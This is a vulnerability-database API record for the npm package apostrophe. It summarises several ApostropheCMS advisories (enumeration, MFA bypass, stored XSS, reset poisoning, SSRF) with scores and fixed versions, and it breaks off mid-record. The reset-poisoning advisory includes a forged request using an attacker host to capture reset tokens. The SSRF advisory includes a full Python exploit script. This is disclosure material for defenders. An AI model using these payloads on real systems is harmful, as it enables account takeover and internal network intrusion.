Look up vulnerable packages by Package URL (purl).

GET /api/packages/971426?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/971426?format=api",
    "purl": "pkg:npm/apostrophe@0.5.348",
    "type": "npm",
    "namespace": "",
    "name": "apostrophe",
    "version": "0.5.348",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": null,
    "latest_non_vulnerable_version": null,
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78332?format=api",
            "vulnerability_id": "VCID-1nxf-g588-c3ey",
            "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08901",
                            "published_at": "2026-06-11T12:55:00Z"
                        },
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08945",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33877"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33877",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33877"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/e266cffd8c0d331a9b05c92bf11616556efcdc77",
                    "reference_id": "e266cffd8c0d331a9b05c92bf11616556efcdc77",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:30:48Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/e266cffd8c0d331a9b05c92bf11616556efcdc77"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mj7r-x3h3-7rmr",
                    "reference_id": "GHSA-mj7r-x3h3-7rmr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mj7r-x3h3-7rmr"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mj7r-x3h3-7rmr",
                    "reference_id": "GHSA-mj7r-x3h3-7rmr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:30:48Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mj7r-x3h3-7rmr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api",
                    "purl": "pkg:npm/apostrophe@4.29.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-wscg-efgt-e7bw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"
                }
            ],
            "aliases": [
                "CVE-2026-33877",
                "GHSA-mj7r-x3h3-7rmr"
            ],
            "risk_score": 1.6,
            "exploitability": "0.5",
            "weighted_severity": "3.3",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1nxf-g588-c3ey"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/77344?format=api",
            "vulnerability_id": "VCID-56a7-tu1w-fua8",
            "summary": "ApostropheCMS is an open-source content management framework. Prior to version 4.28.0, the bearer token authentication middleware in `@apostrophecms/express/index.js` (lines 386-389) contains an incorrect MongoDB query that allows incomplete login tokens — where the password was verified but TOTP/MFA requirements were NOT — to be used as fully authenticated bearer tokens. This completely bypasses multi-factor authentication for any ApostropheCMS deployment using `@apostrophecms/login-totp` or any custom `afterPasswordVerified` login requirement. Version 4.28.0 fixes the issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32730",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32209",
                            "published_at": "2026-06-12T12:55:00Z"
                        },
                        {
                            "value": "0.0013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32023",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32730"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32730",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32730"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v9xm-ffx2-7h35",
                    "reference_id": "GHSA-v9xm-ffx2-7h35",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v9xm-ffx2-7h35"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-v9xm-ffx2-7h35",
                    "reference_id": "GHSA-v9xm-ffx2-7h35",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-19T16:12:00Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-v9xm-ffx2-7h35"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/375187?format=api",
                    "purl": "pkg:npm/apostrophe@4.28.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1nxf-g588-c3ey"
                        },
                        {
                            "vulnerability": "VCID-7fb7-sbm9-u7fa"
                        },
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-pt6d-cm84-e7c4"
                        },
                        {
                            "vulnerability": "VCID-t3jk-9ttu-nfgt"
                        },
                        {
                            "vulnerability": "VCID-xez4-ydba-nfdb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.28.0"
                }
            ],
            "aliases": [
                "CVE-2026-32730",
                "GHSA-v9xm-ffx2-7h35"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-56a7-tu1w-fua8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/77778?format=api",
            "vulnerability_id": "VCID-7fb7-sbm9-u7fa",
            "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in the @apostrophecms/color-field module, where color values prefixed with -- bypass TinyColor validation intended for CSS custom properties, and the launder.string() call performs only type coercion without stripping HTML metacharacters. These unsanitized values are then concatenated directly into <style> tags both in per-widget style elements rendered for all visitors and in the global stylesheet rendered for editors, with the output marked as safe HTML. An editor can inject a value which closes the style tag and executes arbitrary JavaScript in the browser of every visitor to any page containing the affected widget. This enables mass session hijacking, cookie theft, and privilege escalation to administrative control if an admin views draft content. This issue has been fixed in version 4.29.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33889",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02501",
                            "published_at": "2026-06-11T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02503",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33889"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33889",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33889"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481",
                    "reference_id": "6a89bdb7acdb2e1e9bf1429961a6ba7f99410481",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-97v6-998m-fp4g",
                    "reference_id": "GHSA-97v6-998m-fp4g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-97v6-998m-fp4g"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g",
                    "reference_id": "GHSA-97v6-998m-fp4g",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api",
                    "purl": "pkg:npm/apostrophe@4.29.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-9jxc-az1j-3qex"
                        },
                        {
                            "vulnerability": "VCID-jkpm-13y1-5yfj"
                        },
                        {
                            "vulnerability": "VCID-wscg-efgt-e7bw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"
                }
            ],
            "aliases": [
                "CVE-2026-33889",
                "GHSA-97v6-998m-fp4g"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7fb7-sbm9-u7fa"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360364?format=api",
            "vulnerability_id": "VCID-9jxc-az1j-3qex",
            "summary": "Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation\n## Summary\n\nApostropheCMS's password reset flow constructs the reset URL using `req.hostname`, \nwhich is derived directly from the attacker-controlled HTTP `Host` header when \n`apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows \na victim's email address can send a crafted reset request that causes the application \nto email the victim a reset link pointing to the attacker's domain. When the victim \nclicks the link, the valid reset token is delivered to the attacker, enabling full \naccount takeover.\n\n## Affected Component\n\n`modules/@apostrophecms/login/index.js` — `resetRequest` route  \nPrecondition: `passwordReset: true` is set **and** `apos.baseUrl` is not configured.\n\n## Vulnerability Details\n\nThe `setPrefixUrls` middleware (i18n layer) builds `req.baseUrl` using `req.hostname`:\n\n```js\n// Simplified from i18n middleware\nreq.baseUrl = `${req.protocol}://${req.hostname}`;\nreq.absoluteUrl = req.baseUrl + req.url;\n```\n\nThe `resetRequest` handler then passes this tainted value directly into URL construction:\n\n```js\nconst parsed = new URL(\n  req.absoluteUrl,           // ← tainted by attacker's Host header\n  self.apos.baseUrl\n    ? undefined\n    : `${req.protocol}://${req.hostname}${port}`  // ← also tainted\n);\nparsed.pathname = '/login';\nparsed.searchParams.append('reset', reset);   // real, valid token\nparsed.searchParams.append('email', user.email);\nawait self.email(..., { url: parsed.toString() }, ...);\n// Email sent to victim with URL pointing to attacker-controlled domain\n```\n\nWhen `apos.baseUrl` is configured, it is used unconditionally and the attacker's \n`Host` header is ignored — that path is **not** vulnerable.\n\n## Attack Scenario\n\n1. Attacker identifies a valid user email (e.g. from the site's public interface).\n2. 
Attacker sends:\n```\n   POST /api/v1/login/reset-request\n   Host: evil.attacker.com\n   Content-Type: application/json\n\n   {\"email\": \"victim@example.com\"}\n```\n3. The application emails the victim:\n```\n   Click here to reset your password:\n   http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com\n```\n4. Victim clicks the link; attacker's server captures `TOKEN`.\n5. Attacker calls the real target's reset endpoint with the captured token and \n   sets a new password — full account takeover.\n\n## Preconditions\n\n- `passwordReset: true` configured in login module options (opt-in)\n- `apos.baseUrl` is **not** set (common in development and some production deployments)\n- Attacker knows or can enumerate a valid account email\n\n## Impact\n\nFull account takeover of any account whose email address is known to the attacker. \nNo authentication or interaction beyond sending a single HTTP request is required \nfrom the attacker. The victim need only click a link in a legitimate-looking \npassword reset email from their own site.\n\n## Remediation\n\n**Operators (immediate):** Always set `apos.baseUrl` in your configuration:\n\n```js\n// app.js or module configuration\nmodules: {\n  '@apostrophecms/express': {\n    options: {\n      baseUrl: 'https://yourdomain.com'\n    }\n  }\n}\n```\n\n**Framework fix (recommended):** The `resetRequest` route should refuse to proceed \nif `apos.baseUrl` is not configured, rather than falling back to the tainted \n`req.hostname`. 
Example:\n\n```js\n// In resetRequest handler\nif (!self.apos.baseUrl) {\n  throw self.apos.error(\n    'invalid',\n    'apos.baseUrl must be configured to enable password reset'\n  );\n}\nconst parsed = new URL(self.loginUrl(), self.apos.baseUrl);\n```\n\nThis eliminates the attacker-controlled input entirely from the URL construction path.\n\n## References\n\n- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)\n- [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45013",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34038",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45013"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-13T03:36:29Z/"
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013",
                    "reference_id": "CVE-2026-45013",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gf43-24g3-5hw2",
                    "reference_id": "GHSA-gf43-24g3-5hw2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gf43-24g3-5hw2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1164814?format=api",
                    "purl": "pkg:npm/apostrophe@4.30.0-alpha.1",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.30.0-alpha.1"
                }
            ],
            "aliases": [
                "CVE-2026-45013",
                "GHSA-gf43-24g3-5hw2"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9jxc-az1j-3qex"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360268?format=api",
            "vulnerability_id": "VCID-jkpm-13y1-5yfj",
            "summary": "Apostrophe has authenticated SSRF in rich-text widget import via @apostrophecms/area/validate-widget\n### Summary\nApostropheCMS contains an authenticated server-side request forgery (SSRF) in the rich-text widget import flow. An authenticated user who can submit/edit rich-text widget content can cause the server to fetch attacker-controlled URLs during widget validation. For image-compatible responses, the fetched content can be persisted and re-hosted by Apostrophe, allowing response exfiltration.\n\n### Details\n  The vulnerable flow is in the rich-text widget sanitizer:\n  - `packages/apostrophe/modules/@apostrophecms/rich-text-widget/index.js`\n  - `packages/apostrophe/modules/@apostrophecms/area/index.js`\n  - `packages/apostrophe/modules/@apostrophecms/widget-type/index.js`\n\nRelevant behavior:\n  1. The backend accepts a widget payload containing `import.html`.\n  2. It parses `<img src=...>` values from that HTML.\n  3. For each image, it resolves the URL with:\n     - `new URL(src, input.import.baseUrl || self.apos.baseUrl)`\n  4. It then performs a server-side `fetch(url)`.\n  5. The fetched body is written to a temp file and imported through Apostrophe image/attachment logic.\n\n  This is reachable during widget validation through:\n  - `POST /api/v1/@apostrophecms/area/validate-widget?aposMode=draft`\n\n\n### PoC\n 1. Start a local HTTP server with a valid PNG:\n```bash\n     mkdir -p /tmp/apos-poc\n     base64 -d > /tmp/apos-poc/secret.png <<'EOF'\n     iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/x8AAwMCAO+y1n0AAAAASUVORK5CYII=\n     EOF\n     cd /tmp/apos-poc && python3 -m http.server 7777 --bind 127.0.0.1\n```\n2. 
Run the following Python PoC:\n```python\n#!/usr/bin/env python3\nimport argparse\nimport json\nimport sys\nfrom urllib.parse import urljoin\n\nimport requests\n\n\ndef login(base_url: str, username: str, password: str) -> str:\n    url = urljoin(base_url, \"/api/v1/@apostrophecms/login/login\")\n    r = requests.post(\n        url,\n        json={\n            \"username\": username,\n            \"password\": password\n        },\n        timeout=20\n    )\n    r.raise_for_status()\n    data = r.json()\n    token = data.get(\"token\")\n    if not token:\n      raise RuntimeError(f\"Login succeeded but no token was returned: {data}\")\n    return token\n\n\ndef trigger(base_url: str, token: str, area_field_id: str, target_url: str) -> dict:\n    url = urljoin(\n        base_url,\n        \"/api/v1/@apostrophecms/area/validate-widget?aposMode=draft\"\n    )\n    payload = {\n        \"areaFieldId\": area_field_id,\n        \"type\": \"@apostrophecms/rich-text\",\n        \"widget\": {\n            \"type\": \"@apostrophecms/rich-text\",\n            \"content\": \"<p>seed</p>\",\n            \"import\": {\n                \"html\": f'<img src=\"{target_url}\">',\n                \"baseUrl\": target_url.rsplit(\"/\", 1)[0] if \"/\" in target_url else target_url\n            }\n        }\n    }\n    r = requests.post(\n        url,\n        headers={\n            \"Authorization\": f\"Bearer {token}\",\n            \"Accept\": \"application/json\"\n        },\n        json=payload,\n        timeout=30\n    )\n    r.raise_for_status()\n    return r.json()\n\n\ndef main() -> int:\n    parser = argparse.ArgumentParser(\n        description=\"Authenticated ApostropheCMS SSRF PoC via rich-text widget import.\"\n    )\n    parser.add_argument(\"--base-url\", default=\"http://127.0.0.1:3000\")\n    parser.add_argument(\"--username\", default=\"admin\")\n    parser.add_argument(\"--password\", default=\"admin123\")\n    parser.add_argument(\"--area-field-id\", 
default=\"cd4f89f5b834d0036f3867f1507a8add\")\n    parser.add_argument(\"--target-url\", default=\"http://127.0.0.1:7777/secret.png\")\n    parser.add_argument(\n        \"--fetch-image\",\n        action=\"store_true\",\n        help=\"Fetch the generated Apostrophe image URL after exploitation.\"\n    )\n    args = parser.parse_args()\n\n    try:\n        token = login(args.base_url, args.username, args.password)\n        result = trigger(args.base_url, token, args.area_field_id, args.target_url)\n    except Exception as exc:\n        print(f\"[!] Exploit failed: {exc}\", file=sys.stderr)\n        return 1\n\n    print(\"[+] Login OK\")\n    print(f\"[+] Bearer token: {token}\")\n    print(\"[+] Exploit response:\")\n    print(json.dumps(result, indent=2))\n\n    widget = result.get(\"widget\") or {}\n    image_ids = widget.get(\"imageIds\") or []\n    if not image_ids:\n        print(\"[-] No imageIds returned. Target may have been fetched but not persisted as an image.\")\n        return 0\n\n    image_id = image_ids[0]\n    image_path = f\"/api/v1/@apostrophecms/image/{image_id}/src\"\n    image_url = urljoin(args.base_url, image_path)\n    print(f\"[+] Generated image id: {image_id}\")\n    print(f\"[+] Generated image URL: {image_url}\")\n\n    if args.fetch_image:\n        r = requests.get(image_url, allow_redirects=True, timeout=30)\n        print(f\"[+] Final fetch status: {r.status_code}\")\n        print(f\"[+] Final URL: {r.url}\")\n        print(f\"[+] Retrieved bytes: {len(r.content)}\")\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n3. Example usage:\n```bash\n     python3 poc.py \\\n       --base-url http://127.0.0.1:3000 \\\n       --username admin \\\n       --password admin123 \\\n       --area-field-id cd4f89f5b834d0036f3867f1507a8add \\\n       --target-url http://127.0.0.1:7777/secret.png \\\n       --fetch-image\n```\n  4. 
Expected result:\n      - The local listener receives:\n        GET /secret.png HTTP/1.1\n      - The API response includes a rewritten Apostrophe image URL and imageIds.\n      - The generated image URL can then be fetched through the application.\n\nAdditional note:\n\n  - If the target returns non-image content such as secret.txt, the SSRF still occurs, but later image processing can fail. This still allows blind or semi-blind SSRF behavior useful for internal reachability checks and rough port enumeration.\n\n### Impact\nAn authenticated user with permission to submit or edit rich-text widget content can:\n  - trigger server-side requests to internal services (127.0.0.1, private subnets, etc.)\n  - perform blind or semi-blind internal port and service discovery\n  - exfiltrate image-compatible responses because Apostrophe stores and re-hosts the fetched content",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45012",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13471",
                            "published_at": "2026-06-12T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45012"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe"
                },
                {
                    "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-pr28-mf3q-qpg6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-pr28-mf3q-qpg6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45012",
                    "reference_id": "CVE-2026-45012",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
